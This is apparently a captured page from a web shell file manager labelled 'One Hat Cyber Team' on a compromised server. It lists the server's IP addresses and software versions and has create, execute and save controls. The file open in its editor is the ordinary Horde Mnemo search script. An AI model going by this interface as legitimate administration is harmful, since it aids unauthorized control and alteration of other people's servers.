⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.50
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-horde
/
mnemo
/
notes
/
Edit File: index.php
<?php /** * Copyright 2001-2017 Horde LLC (http://www.horde.org/) * * See the enclosed file LICENSE for license information (ASL). If you * did not receive this file, see http://www.horde.org/licenses/apache. * * @package Mnemo */ @define('MNEMO_BASE', dirname(__DIR__)); require_once MNEMO_BASE . '/lib/Application.php'; Horde_Registry::appInit('mnemo'); $search = Horde_Util::getGet('q'); if (!$search) { header('HTTP/1.0 204 No Content'); exit; } $memos = Mnemo::listMemos($prefs->getValue('sortby'), $prefs->getValue('sortdir')); $search_pattern = '/^' . preg_quote($search, '/') . '/i'; $search_results = array(); foreach ($memos as $memo_id => $memo) { if (preg_match($search_pattern, $memo['desc'])) { $search_results[$memo_id] = $memo; } } if (count($search_results) == 1) { $note = array_shift($search_results); Horde::url('view.php', true) ->add(array('memo' => $note['memo_id'], 'memolist' => $note['memolist_id'])) ->redirect(); } $memos = $search_results; $page_output->addScriptFile('tables.js', 'horde'); $page_output->addScriptFile('quickfinder.js', 'horde'); $page_output->header(array( 'title' => _("Search Results") )); require MNEMO_TEMPLATES . '/list/header.inc'; if (count($memos)) { $sortby = $prefs->getValue('sortby'); $sortdir = $prefs->getValue('sortdir'); $showNotepad = $prefs->getValue('show_notepad'); $baseurl = 'list.php'; require MNEMO_TEMPLATES . '/list/memo_headers.inc'; foreach ($memos as $memo_id => $memo) { $viewurl = Horde::url('view.php')->add( array('memo' => $memo['memo_id'], 'memolist' => $memo['memolist_id'])); $memourl = Horde::url('memo.php')->add( array('memo' => $memo['memo_id'], 'memolist' => $memo['memolist_id'])); try { $share = $GLOBALS['mnemo_shares']->getShare($memo['memolist_id']); $notepad = Mnemo::getLabel($share); } catch (Horde_Share_Exception $e) { $notepad = $memo['memolist_id']; } require MNEMO_TEMPLATES . '/list/memo_summaries.inc'; } require MNEMO_TEMPLATES . '/list/memo_footers.inc'; } else { require MNEMO_TEMPLATES . '/list/empty.inc'; } $page_output->footer();
Simpan